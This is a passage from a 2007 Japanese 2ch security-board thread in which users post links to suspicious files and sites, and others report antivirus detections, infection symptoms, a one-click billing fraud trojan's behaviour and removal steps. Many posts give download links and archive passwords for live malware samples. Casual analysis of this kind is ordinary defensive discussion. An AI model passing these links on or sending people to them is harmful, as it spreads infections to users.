Adodb.Stream 使ったウイルスだな。
IEコンポのブラウザ使うと実行されるみたいだ。IEはAdodb.Streamオブジェクトを作成できなくなったので問題ない。
ブラウザ変えるか、VBScript切っておけ。

327 :名無しさん@お腹いっぱい。:2007/01/07(日) 04:54:58
上のほうにあったこれだけど、
tp://pcshop.tyabo.com/no-to/a-001.htm
アクセスして手に入いるdown.exeを実行すると1.exeが手に入る
http://ccfa.info/cgi-bin/up/src/up41519.jpg
http://ccfa.info/cgi-bin/up/src/up41520.jpg
それほど対応していないっぽいし、今すぐ手にいれようぜ!

328 :327:2007/01/07(日) 04:55:39
なんか知らんが手に入るが手に入いるに変換された・・・orz

329 :名無しさん@お腹いっぱい。:2007/01/07(日) 05:17:28
>>327
なんか誤検出臭い組み合わせだね

330 :名無しさん@お腹いっぱい。:2007/01/07(日) 05:21:37
やべ

331 :名無しさん@お腹いっぱい。:2007/01/07(日) 08:48:25
ttp://amilala.blogspot.com
ここを踏んでしまったんだけど、これって何?
今のところPCは正常に動作しているみたいだけど、すごく不安

332 :名無しさん@お腹いっぱい。:2007/01/07(日) 10:20:38
>>331
知ってる人はURLの「amilala」の文字列だけでわかるよ。

Amilalaの亜種?
文字列とかAmialaだけど、動作が良くわからない。
最初のウィンドウでOKを押すと変な場所に飛ばされて終わり。
キャンセルを押すとAmilala?が発動してクレジットカード番号を求めてくる。
OKかキャンセルをクリックするとJava仮想マシンが起動して妙なウィンドウが表示される。
さらにMS06-001のセキュリティホールを利用すると思われる悪意あるコードをダウンロードし始める。

ちなみに、Firefoxなど非IE系ブラウザで開いても、

UgH w0TTa d1CkhEAd mEEh NeVa sEEn
uSe M$IE6!

と、IE6を使うように指示されるだけ。
OKをクリックするとMicrosoftのIE6 SP1のダウンロードページに飛ばされる。

333 :名無しさん@お腹いっぱい。:2007/01/07(日) 16:12:52
13 名前:名無しさんに接続中… [sage] 投稿日:2007/01/07(日) 10:50:07 ID:ctL4yOGU
  ______________
  |                    |
  |   @ニフティ新料金プラン発表!マンセー! |
  |               |
  | ttp://headline-news.tripod.com/national/20061118-00000102-mai-soc.html                    |
  |                     |
  |__n_________n _|
   ( ( )            ( ) )
    |  |     / ̄ ̄||     |  |
    |_|   / ̄ ̄\||\   |_|
   (._ノ\/         \/\_.)
    \  \.   /  \ |  /
      \___)   (・)  (・) |/
      (6-------◯⌒つ |
        |   /_||||||||| |
       \    \_//
       /⌒)     /\
      /  / \_/\   \
     (.\/        \/.)
     | ̄)           ( ̄|
    __|  |             |  |__
   .(__)            (__)
from http://tmp6.2ch.net/test/read.cgi/download/1168006612/


↑これウイルスですかね

334 :名無しさん@お腹いっぱい。:2007/01/07(日) 17:21:30
書き込み自体はウイルスじゃないよ

335 :名無しさん@お腹いっぱい。:2007/01/07(日) 18:30:46
>>333
だから何だよ屑。死ね。

336 :名無しさん@お腹いっぱい。:2007/01/07(日) 21:10:25
>>333
ブラクラ・・・というか厨房ホイホイかなぁ
しかもご丁寧にやばいものまでダウンロードさせようとする

337 :3:2007/01/10(水) 03:43:13
裏情報ランキング
http://ia.kakiko.com/sami/2/yty.htm
キムタクの超意外な過去

338 :名無しさん@お腹いっぱい。:2007/01/10(水) 14:17:02
>>337
芋電、au,Jkyからご利用下さいって…。ヴォーダフォンにすらなっていないのか。
だけどメアドはpdxに対応している不思議なサイトだな…

339 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:41:12
( ´_ゝ`)フーン

340 :名無しさん@お腹いっぱい。:2007/01/15(月) 15:18:08
ttp://zetubou.mine.nu/itoshiki/nozomu/zetubou4113.exe

341 :名無しさん@お腹いっぱい。:2007/01/15(月) 17:25:13
大勝利(゚∀゚)

342 :名無しさん@お腹いっぱい。:2007/01/15(月) 18:08:31
そうか、そうか

343 :名無しさん@お腹いっぱい。:2007/01/15(月) 21:45:18
>>340
Perfect DarkとかいうP2Pソフトと料理のレシピ(一部画像入り)

344 :名無しさん@お腹いっぱい。:2007/01/15(月) 21:51:52
>>343
と、いうことは創価の仕業か

345 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:04:30
NIS2007入れたら>>224検出しない・・・

346 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:33:09
>>345
ヒント:解凍

347 :名無しさん@お腹いっぱい。:2007/01/19(金) 16:31:06
tp://aaa-www.net/~sakurano/webgoudou/0062/HDD_cleaner.exe

348 :345:2007/01/19(金) 16:49:15
>>346
もちろん解凍済み

再うp

ダウソパス:scr
ZiP解凍パス:scr
ttp://kossie.run.buttobi.net/cgi-bin/up/src/kos0728.rar.html

349 :名無しさん@お腹いっぱい。:2007/01/19(金) 19:15:49
>>345

>>266


350 :名無しさん@お腹いっぱい。:2007/01/20(土) 08:24:03
ttp://www.vipper.net/vip162902.zip.html
vip

351 :名無しさん@お腹いっぱい。:2007/01/20(土) 09:46:51
Trojan.Win32.KillFiles.ki

352 :名無しさん@お腹いっぱい。:2007/01/20(土) 09:51:15
すいません、教えてください。
>>350のファイルって危険ですか?
ダウンロードしてしまったのですが・・・。
解凍までしてしまいました。

353 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:04:37
>>352
実行しなければおk

354 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:08:09
このスレ的には、中に入ってるyoujo.scrっていうのを動かさなきゃだめだろ。

355 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:10:46
>>353
いや・・実行しちゃいまして。
応答なしになってましたけど。
その後特に変化無いんですが、どうなんでしょうか?

356 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:19:05
coopen.exe from China

357 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:22:30
>>354
山田さんですか?

358 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:22:52
>>355
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FHARADONG%2EJ&VSect=Sn
一回動いて終わりらしいし、もうどうしようもないんじゃね?

359 :名無しさん@お腹いっぱい。:2007/01/20(土) 12:30:16
ランタイムも入れたけどwindows\help\.hlpがないって怒られる

360 :名無しさん@お腹いっぱい。:2007/01/20(土) 12:32:19
こういう時こそインスコマンが来てくれないと

361 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:21:02
おお、インスコマン


362 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:04:18
Trojan.Win32.KillFiles.ki
カスペじゃまだ対策出されてないね

363 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:09:31
>>348と同じジャマイカ

364 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:23:53
Trojan.Win32.KillFiles.ki
カスペも検知したお



365 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:32:19
当たり前だがこれで完璧なんてソフトはないな

366 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:37:56
NOD32v2.7 解凍するとすでに削除していた、汗

367 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:42:04
>>364
検知じゃなくて対応ね
↓ここ
http://www.viruslist.com/en/viruses/encyclopedia?virusid=125040

368 :┏(^o^)┛:2007/01/20(土) 22:23:44
ttp://www.uploda.org/uporg660874.png
ttp://www.vipper.net/vip163413.png
ttp://www.uploda.org/uporg660877.png
ttp://www.vipper.net/vip163416.png
ttp://www.vipper.net/vip163418.png
ttp://www.vipper.net/vip163420.png


369 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:39:33
ttp://www.uploda.org/uporg661811.rar.html

370 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:45:52
>>369
Worm.Win32.Antinny.u

371 :名無しさん@お腹いっぱい。:2007/01/21(日) 19:25:20
ttp://a-draw.com/uploader/src/up11961.zip.html

372 :名無しさん@お腹いっぱい。:2007/01/21(日) 19:38:51
ttp://www.geocities.jp/mimahisayuki/kiken002.mid

373 :名無しさん@お腹いっぱい。:2007/01/21(日) 19:53:57
>>372
Microsoft GS Wavetable SW Synth + WMPで再生すると青画面
プレーヤーによっては大丈夫かも

374 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:59:58
>>371
http://tmp.2ch.net/download/kako/1008/10086/1008690541.html

>>372
GOM Playerで再生。一瞬のブルー画面後、XPがクラッシュ・強制再起動
jetAudioでは、無問題。単なるhigh-tone sound
http://www.vipper.net/vip164254.png

375 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:01:57
h消し忘れスマソ


376 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:47:56

( ^ω^)

377 :名無しさん@お腹いっぱい。:2007/01/22(月) 01:26:50
>>372
YAMAHA S-YXG50 でも聞けた
Microsoft GSだけかな?

378 :名無しさん@お腹いっぱい。:2007/01/22(月) 05:13:47
すみません。教えていただきたい事があります。

・行った事
>>350をDLし実行しました。
実行前にウイルス検査をして安全を確認しました。

・結果
ピロウイルスに感染しました。(そういう旨の画像が表示された)

・症状
動画やフォルダなどが書き換えられました。
圧縮ソフトなどが使用できなくなりました。
気づかないだけで他にもあるかもしれません。

・対処
コンピュータ全体にウイルススキャンをしました。
ウイルスは発見できませんでした。

・教えていただきたい事
@書き換えられた動画等は元に戻せるのでしょうか?
Aやらないといけない対処はあるのでしょうか?

よろしくお願いいたします。
ちなみに、セキュリティーソフトはウイルスセキュリティーを使用しています。



379 :名無しさん@お腹いっぱい。:2007/01/22(月) 06:24:27
>>378
当たり前のことだが、ソースネクストに電話化何かで問い合わせて対応してもらうのが一番いい。
既に対応している他社の製品を買ってもいいだろうけど・・・・
期限が残ってたらもったいないし、他のウイルスセキュリティを使ってる人も助かる。

380 :名無しさん@お腹いっぱい。:2007/01/22(月) 06:37:44
>>378
> @書き換えられた動画等は元に戻せるのでしょうか?
ファイルが変更されると、バックアップがない限り元に戻すことはできません。

> Aやらないといけない対処はあるのでしょうか?
レジストリが書き換えられた結果として、機能が使用できなくなったりしています。
レジストリのバックアップがあれば、元に戻すことはできます。
また、Windowsの知識があれば、原因をたどって手動で元に戻すことは可能でしょうが
そうでなければ、OSのリカバリをすることが安全確実です。

381 :名無しさん@お腹いっぱい。:2007/01/22(月) 06:38:43
>>378
>ちなみに、セキュリティーソフトはウイルスセキュリティーを使用しています。

そんな無茶すんなって!泣
普通にネットを楽しむぐらいならウイルスセキュリティーでもいいと思うけど
2ちゃん内をうろうろ、ましてや、得体の知れないものをダウソ&実行するときには
ウイルスセキュリティーでやるなど、自殺行為だよ;;

ttp://www.kaspersky.co.jp/scanforvirus/
オンラインスキャンで探って、まずは問題をおこしているやつを特定することから始めてくれ
ただし、OSのクリーンインストールを行わねばならない可能性を前提にして
運良く直ればいいけど的にことをすすめてくれ

382 :378:2007/01/22(月) 07:12:47
>>379-381
返答ありがとうございます。
とてもうれしかったです。

オンラインスキャンをかけてみたのですが(シマンテック)
2chのログ(専ブラはLive2chです)がひかかるぐらいでした。
カスペルスキーでは感染なしとでました。

追加の症状でプログラムがどんどん使用できなくなっています。
レジストリの」バックアップに関しては
手動でやるもの(自動で無い)なら行ってないです。
いさぎよくリカバリですかね?

383 :名無しさん@お腹いっぱい。:2007/01/22(月) 07:38:23
>>382
前にテストマシンで実行したことがあるが、ドライブ内の.exeファイルのほとんどが消されたんで、再インストールするしかなかった。

384 :378:2007/01/22(月) 07:51:05
>>383
やはりそうですか・・・。

もし、ウイルスセキュリティー以外のソフトを使用していたら
防げたのでしょうか?

新しいソフトの購入も必須ですね。
ありがとうございました。

385 :名無しさん@お腹いっぱい。:2007/01/22(月) 08:00:15
>>384
防げたでしょうね

一つだけ言っておきます
たぶん、あなたはそのまま再インストールするだけでしょう
多くのVSユーザがそうやって泣き寝入りしています

もし、私なら消費者センターなどに通報して
粗悪ソフトを売りつけたソースネクストを断罪するように行動しますよ

386 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:35:48
( ´,_ゝ`)プッ

387 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:39:35
>>386
社員は黙ってろ
フリーで出てるようなソフトを1980で売るしか能がないくせに

388 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:46:58
ウイルスセキュリティを叩いてるやつはなんでいつも程度が低いんだろう。

389 :名無しさん@お腹いっぱい。:2007/01/22(月) 10:06:31
>>388
ヒント
・ 少しでもセキュリティに関心があるやつなら買うという選択肢はない
・ 買わないものをとりたてて糾弾する理由はない

390 :名無しさん@お腹いっぱい。:2007/01/22(月) 15:14:35
>>382
気休めにドゾー
ttp://www.forest.impress.co.jp/lib/sys/file/delundel/datarecovery.html

391 :名無しさん@お腹いっぱい。:2007/01/22(月) 16:43:34
ttp://tmp6.2ch.net/test/read.cgi/download/1168956744/457

392 :名無しさん@お腹いっぱい。:2007/01/22(月) 19:14:07
>>391
404

393 :名無しさん@お腹いっぱい。:2007/01/22(月) 19:20:54
>>391
110

394 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:54:50
ttp://tmp6.2ch.net/test/read.cgi/download/1168956744/477

395 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:06:17
>>394
おっぱい

396 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:09:33
aは何をやりたいんだろう?

397 :名無しさん@お腹いっぱい。:2007/01/23(火) 03:41:15
http://www.zentastic.com/videos/bmevideo-3.wmv
これ恐くてひらけない

398 :名無しさん@お腹いっぱい。:2007/01/23(火) 05:46:27
>>397
板違い。さよなら
http://hobby9.2ch.net/test/read.cgi/occult/1163331290/2

399 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:31:44
http://www.Goggle.com/

これってヤバイとか?

400 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:40:13
>>399
http://www.youtube.com/watch?v=eFdm4PxRWd4&eurl=

401 :名無しさん@お腹いっぱい。:2007/01/24(水) 03:40:36
マジで?
linuxで踏んでみるか・・・

402 :名無しさん@お腹いっぱい。:2007/01/24(水) 04:58:33
>>400
ポップアップブロック有効になってればそんなにならないw

403 :名無しさん@お腹いっぱい。:2007/01/24(水) 05:22:00
232 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/01/24(水) 01:26:01
http://www.easyspyremover.com/
このサイトからツールを落としてインストールしたんだけど詐欺ソフトだったりする?



404 :名無しさん@お腹いっぱい。:2007/01/24(水) 19:29:48
>>403
システムドクターみたいな絵だな

405 :名無しさん@お腹いっぱい。:2007/01/24(水) 22:13:08
easyspyremover でググッてもあんまりヒットしないなぁ。よく分からん

406 :名無しさん@お腹いっぱい。:2007/01/25(木) 13:55:18
http://pangyaup.pya.jp/uploader/src/up3229.zip
お願いします。

407 :名無しさん@お腹いっぱい。:2007/01/25(木) 17:10:26
AntiVir Found BDS/PoisonIvy.j backdoor
ArcaVir Found nothing
Avast Found Win32:Small-DRG
AVG Antivirus Found Agent.WL
BitDefender Found BehavesLike:Win32.ExplorerHijack (probable variant)
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found Backdoor.Win32.PoisonIvy.j
Fortinet Found nothing
Kaspersky Anti-Virus Found Backdoor.Win32.PoisonIvy.j
NOD32 Found nothing
Norman Virus Control Found W32/PoisonIvy.gen3
VirusBuster Found nothing
VBA32 Found Trojan-Downloader.Obfuscated.30 (paranoid heuristics) (probable variant)

408 :名無しさん@お腹いっぱい。:2007/01/25(木) 18:23:41
ttp://2chshare.net/mini/files/2chshare-mini_0296.zip.html

409 :名無しさん@お腹いっぱい。:2007/01/25(木) 18:28:06
fujacksキタ━━━━━━(゚∀゚)━━━━━━ !!

410 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:30:09
>>399
http://www.goggle.com/
小文字じゃないの?

411 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:31:59
あ、おんなじだなぁ。で何がこれ危険なのかわかんね。

412 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:52:23
>>406 なにも問題ない。

413 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:13:13
>>408
OfcDog.exe.exe が不明である以外、他3ケはウィルス。

414 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:15:38
よって、どなたか、OfcDog.exe.exe を検証できる方、いらっしゃいませんか。

415 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:41:51
他三個はウイルスって同じファイルじゃねーか。
お祈りパンダが見たくてVM上でどちらも実行してみたが何も起こらなかった。

416 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:43:54
それもまた寂しい結果だな(-"-)

417 :名無しさん@お腹いっぱい。:2007/01/26(金) 12:37:38
いつの間にか鑑定スレになっとるがな。

418 :pika:2007/01/26(金) 22:54:51
>>414
リソースを見てみたけど ただのアイコンファイルみたいです。
無害。

419 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:46:52
ttp://up.viploader.net/src/viploader72840.zip.html
vip

420 :名無しさん@お腹いっぱい。:2007/01/28(日) 03:16:27
>>419
あやしいファイル自体が存在しねえ
cmdなんか中身見れるし

421 :名無しさん@お腹いっぱい。:2007/01/28(日) 05:20:17
ttp://kasamatusan.sakura.ne.jp/cgi-bin2/src/ichi72163.jpg.html
ヤバいと聞いたが、どんなもんですかいのう?

422 :名無しさん@お腹いっぱい。:2007/01/28(日) 06:14:28
404

423 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:08:06
これおながい。

253 名前:名無氏[sage] 投稿日:2007/01/28(日) 13:09:46 ID:???
ttp://www.uploda.org/uporg670820.rar.html

エロゲ系スレで拾ったnodvdファイルらしいですが。
なんか怪しい(winフォルダに入れて実行とか)のでお願いします。
回答したデスクトップ上のフォルダ内で一度誤って実行してしまったんですけど大丈夫ですか?
(ウィルス反応なし、今のところ異常なし)
おね。

424 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:25:43
>>423
404ですので ロダに上げて下さい。

425 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:39:25
>>424
これです。
ttp://www.nya-taloda.jpn.org/2MB/src/up15847.zip

解凍蓮:virus

426 :名無しさん@お腹いっぱい。:2007/01/29(月) 13:00:48
>>425
調べたけど大丈夫。

427 :名無しさん@お腹いっぱい。:2007/01/29(月) 14:55:48
ここは鑑定スレじゃねぇ

428 :名無しさん@お腹いっぱい。:2007/01/29(月) 15:06:47
ハルヒ・最萌選対スレは移行しました。ブックマークの変更をお願いします。
http://jbbs.livedoor.jp/anime/4218/


429 :名無しさん@お腹いっぱい。:2007/01/29(月) 21:24:06
>>426
dクスコ。

430 :名無しさん@お腹いっぱい。:2007/01/30(火) 04:01:54
http://www.uploda.org/uporg673501.zip.html   pw virus

431 :名無しさん@お腹いっぱい。:2007/01/30(火) 04:16:20
>>430
うぜーなゴミ
>>425と同じじゃねえか

432 :名無しさん@お腹いっぱい。:2007/01/31(水) 01:02:59
http://www.peppar.jp/ok_sk2.php

これなんですか?大丈夫ですか

433 :名無しさん@お腹いっぱい。:2007/01/31(水) 01:03:35
よろしこ

434 :名無しさん@お腹いっぱい。:2007/01/31(水) 04:14:34
>>432
そもそも鑑定スレじゃねーんだよ
ま、ほとんどそうなってるけどさ

でもせめてファイルにしろよ
スレタイ読めるだろうが
単なるサイトの鑑定ならラウンジでやれ

435 :名無しさん@お腹いっぱい。:2007/01/31(水) 10:46:43
http://c-au.2ch.net/test/-/sec/1167405312/391

436 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:19:29
最近はあまり面白いウイルス無いな

437 :名無しさん@お腹いっぱい。:2007/02/01(木) 00:14:17
面白いウィルスって何?

438 :名無しさん@お腹いっぱい。:2007/02/01(木) 00:32:12
ハルヒウイルス

439 :名無しさん@お腹いっぱい。:2007/02/03(土) 10:21:55
uajapan.com
↑から落とせるワンクリウェア
http://www.virustotal.com/vt/en/resultadof?ed0842cc57dc66bfa654ed430da2ec3c

実行するとどうなるか誰か試してくれ

440 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 13:41:01
htmlファイルに見せかけたexeをダブルクリックしたら、
tp://uajapan.com/manage.php
が出てきた。

441 :名無しさん@お腹いっぱい。:2007/02/03(土) 13:42:32
>>440
実行したのかw

442 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 13:46:34
デスクトップにseikyu.txtとというファイル名のテキストファイルが出現。
ファイルの内容
------------------------------------------------------------------------

この度は UNIVERSAL ADULT JAPAN をご利用いただき誠にありがとうございます。
利用規約に基づく、サイト利用料金(コンテンツ閲覧費用)の請求をさせていただきます。

・お客様ID   :UA878601
・ご利用開始日 :2007/02/03
・請求金額   :49,800円
・ご利用期間  :ご利用開始日から180日間
・お支払い期日 :ご利用開始日から4日間
・お支払方法  :当方指定の銀行口座へのお振込(※手数料はご負担ください)

■ 請求の詳細及び利用規約の確認・銀行口座の確認、動画の閲覧は

1)当サイトにアクセスください( http://uajapan.com
2)画面右上にログインという項目がありますので、ユーザーIDを入力の上、
  ログインボタンを押してください。
3)請求の内容及び、利用規約、動画の閲覧へのリンクがありますので必要に
  応じて該当するボタン・リンクをクリックして確認を行ってください。

■ 通信販売法に基づく表示             

名称      :UNIVERSAL ADULT JAPAN
責任者     :UNIVERSAL ADULT JAPAN管理室
料金      :49,800円
サポート    :別途定めるフォームによる
電話番号    :045-349-2727

------------------------------------------------------------------------


443 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 13:47:44
再起動をかけてみる

444 :名無しさん@お腹いっぱい。:2007/02/03(土) 13:50:44
インスコマンwwwww

445 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 13:54:47
再起動後
tp://uajapan.com/manage.php
が開き、消しにくい請求画面も開きます。↓画像
http://www.nya-taloda.jpn.org/2MB/src/up16846.png

因みにVISTA風です。

446 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 13:57:40
症状はこれくらいだ

447 :名無しさん@お腹いっぱい。:2007/02/03(土) 13:59:49
アクティブデスクトップのようだな。

448 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 14:13:50
駆除はを削除すればいい。
C:\WINDOWS\system32\systemRedirection.bat
↓これは起動時に”systemRedirection.bat”によって自動的に実行されるみたい。勿論削除対象。
C:\WINDOWS\system32\sys-lnks.exe

sys-lnks.exe↓Micvosoft?
http://www.nya-taloda.jpn.org/2MB/src/up16848.png

449 :インスコマン ◆qlwUrCXXtM :2007/02/03(土) 14:22:19
対応状況(jotti)
AntiVir Found TR/VB.WY.10
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Generic2.YNE
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found Trojan.Click.1914
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found Trojan.Win32.VB.wy
Fortinet Found W32/VB.WY!tr
Kaspersky Anti-Virus Found Trojan.Win32.VB.wy
NOD32 Found probably a variant of Win32/TrojanClicker.VB.PW (probable variant)
Norman Virus Control Found W32/VBTroj.FCI
VirusBuster Found nothing
VBA32 Found nothing


450 :名無しさん@お腹いっぱい。:2007/02/04(日) 08:27:07
確認乙

451 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:21:12
AvastとBitが未対応か・・・。

452 :名無しさん@お腹いっぱい。:2007/02/04(日) 15:11:54
ttp://registryrinse.com/
ttp://registryrinse.com/install.exe
明らかに怪しそうなんだが誰か実行頼む。

453 :名無しさん@お腹いっぱい。:2007/02/04(日) 15:57:23
>>452
起動するとなんかスキャン
ttp://www.uploda.org/uporg680005.jpg

スキャンが終わると音がなってサイトへ
ttp://www.uploda.org/uporg680005.jpg

進んでいくと金銭要求
ttp://www.uploda.org/uporg680005.jpg

まぁ、普通にインチキソフトっぽいね

454 :453:2007/02/04(日) 15:59:07
間違えた、2番目の画像
http://www.uploda.org/uporg680007.jpg
3番目の画像
http://www.uploda.org/uporg680009.jpg

455 :名無しさん@お腹いっぱい。:2007/02/04(日) 17:23:20
>>453
サンクス!

456 :名無しさん@お腹いっぱい。:2007/02/08(木) 02:40:00
今日保存した画像を転載するスレ 13枚目より転載
ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1170674667/78の3つめ
JS:WinBombらしい

457 :名無しさん@お腹いっぱい。:2007/02/08(木) 03:26:54
>>456
普通の虹画だったぞ、他のと間違えてるか何かでは?
試しにavastのオンラインスキャンしたけど、clearだし。

Tested file Status
Lv.1_up75192.jpg clear

VPS version: VPS 0711-2 07.02.2007
Scaner version: 2.0.0
Scanned files: 1
Scanned directories: 0
Archives count: 0
Infected files: 0
Errors: 0
File count: 89.5 kB
Scan time: 0s 21ms
Scanned speed: 4.1 MB/s

458 :名無しさん@お腹いっぱい。:2007/02/08(木) 03:45:16
単なる二次エロパイズリ画像だった。下らん

459 :名無しさん@お腹いっぱい。:2007/02/08(木) 04:20:47
なに!?
落としてくる。

460 :名無しさん@お腹いっぱい。:2007/02/08(木) 18:05:14
http://www.rupan.net/uploader/download/1170866104.exe
( ゚д゚ )テラヤバスwwww

461 :名無しさん@お腹いっぱい。:2007/02/08(木) 18:20:00
ttp://resercher.aboutlaw.com/sgi/followers_list.html
パソコンがガガガッと鳴りました。
ウィルススキャンしたら何も検出されませんが、問題ないですか?

462 :461:2007/02/08(木) 18:51:06
ごめんなさい、鑑定スレではなかったですね。失礼しました。

463 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:53:40
>>462
exe専用でした。

464 :名無しさん@お腹いっぱい。:2007/02/12(月) 08:56:30
ttp://www.mugenhispania.org/
1103291.zip
pass:vip

465 :名無しさん@お腹いっぱい。:2007/02/12(月) 09:29:06
>>464
そもそも鑑定スレじゃねーんだよ
ま、ほとんどそうなってるけどさ

でもせめてファイルにしろよ
スレタイ読めるだろうが
単なるサイトの鑑定ならラウンジでやれ

466 :名無しさん@お腹いっぱい。:2007/02/12(月) 14:06:09
>>465
能書き垂れとらんでさっさと実行してやれやハゲ

467 :名無しさん@お腹いっぱい。:2007/02/12(月) 15:04:16
>>466
つーかどこいけばいいかわからねーんだよハゲ

468 :名無しさん@お腹いっぱい。:2007/02/12(月) 15:05:23
どう見てもURL間違ってるよな

469 :名無しさん@お腹いっぱい。:2007/02/12(月) 15:13:44
ttp://www.crackdb.com/run.exe

470 :名無しさん@お腹いっぱい。:2007/02/12(月) 15:15:13
>>467
つか、ポップアップウィンドウ許可してる?

471 :名無しさん@お腹いっぱい。:2007/02/12(月) 15:21:14
>>470
>ポップアップウィンドウ
セキュ板住人なら、普通許可してないだろ、常識的に考えてw

472 :名無しさん@お腹いっぱい。:2007/02/12(月) 16:44:05
>>469
DR/Zlob.Gen

>>470
危険すぎてするわけねーwwwwwww

473 :名無しさん@お腹いっぱい。:2007/02/13(火) 02:00:32
>>464
どう見てもMUGENのサイトだなw

>>464-472
流れに吹いたw

474 :名無しさん@お腹いっぱい。:2007/02/13(火) 02:44:37
普通は何か分ったらそこでやめるのに、
ここの鑑定人は実行までしてしまう。

さすがセキュ板の鑑定人、勇者。

475 :名無しさん@お腹いっぱい。:2007/02/13(火) 20:37:22
ttp://202.70.242.97/C:/Winny2/up/

476 :名無しさん@お腹いっぱい。:2007/02/14(水) 18:07:25
>>475
ウイルスの山じゃん!

477 :名無しさん@お腹いっぱい。:2007/02/15(木) 06:56:14
>>476
kwsk

478 :名無しさん@お腹いっぱい。:2007/02/15(木) 14:17:08
>>477
山田オルタの山だった

479 :477:2007/02/15(木) 15:57:49
>>478
dd

480 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:38:28
>>478
今夜がやまだぁ〜

481 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:38:58
_           __/ 
_  / __   /   ̄/   .へ       |    .へ              |.  |
   /. __|       /.  /  \    _ノ    /  \  へ .へ ./  _ノ  │
__ノ  __|     /   /    \  ̄ |   /    \  `´ `´   ̄ |.   ・

            _ 、 -──¬‐-、
           /           \
          /             ヽ
         /   ,----、   __    ヽ
         !   /     `'''''''´  `ヽ   i
          |  /              }  |
        _⊥< ,,,,,,,,__           |  !
        /r\f‐┴─-<_  ≦二ヽ__レ'!
       !ノ!. ヽ 厂二二┐ ̄r─‐-、 /⌒!
       l ヽ   !ヽ__//^ヽ!  ̄` ノ/iヽ /
       \__! `ー--/!  \ヽ--'/├'/
         |   / L _ __)ヽ ̄  /‐'
         ,┤ i〈 、_____, 〉 /
        /  !  ヽ\+┼┼+/  /  なんやねん?
      __/   ヽ    `ー‐‐'´ /
  , -‐''" i    \       人
-''~     |    \`ー----‐'´! iヽ、
       ヽ      \     /  i  `ヽ、
        \     丶_/   |    \
         ヽ     /O \   |      \

482 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:42:57
_           __/ 
_  / __   /   ̄/   .へ       |    .へ              |.  |
   /. __|       /.  /  \    _ノ    /  \  へ .へ ./  _ノ  │
__ノ  __|     /   /    \  ̄ |   /    \  `´ `´   ̄ |.   ・





        <⌒/ヽ-、___ (山崎)
       <_/____/

     <⌒/ヽ-、___ (浜田)
    <_/____/

  <⌒/ヽ-、___ (遠藤)
 <_/____/

483 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:43:29
_           __/ 
_  / __   /   ̄/   .へ       |    .へ                      |   |
   /. __|       /.  /  \    _ノ    /  \  へ .へ .へ .へ .へ ./  _ノ  │
__ノ  __|     /   /    \  ̄ |   /    \  `´ `´  `´  `´ `´   ̄ |.   ・



           oO○ ZZzz…
          o
        <⌒/ヽ-、___
       <_/____/

     <⌒/ヽ-、___ i||!!
    <_/____/
             i||!
  <⌒/ヽ-、___
 <_/____/ フフフフw

484 :名無しさん@お腹いっぱい。:2007/02/15(木) 22:45:19
  /__7 ./''7  ___  _/ ̄/_   ヘ       _ノ ̄/  ヘ                _ノ ̄/ / ̄/
  /__7 ./ /  /_  /  / __  / /  \  / ̄  / /  \  ┌────┐/ ̄  ./ /  /
  ___ノ /  /_  /  ー' ___ノ / |_/ \ \  ̄/ /  |_/ \ \ └────┘ ̄/ /   /_/
 /____,./  /__/     /____/       \/  /__/        \/           /__/   /_/

            _ 、 -──¬‐-、
           /           \
          /             ヽ
         /   ,----、   __    ヽ
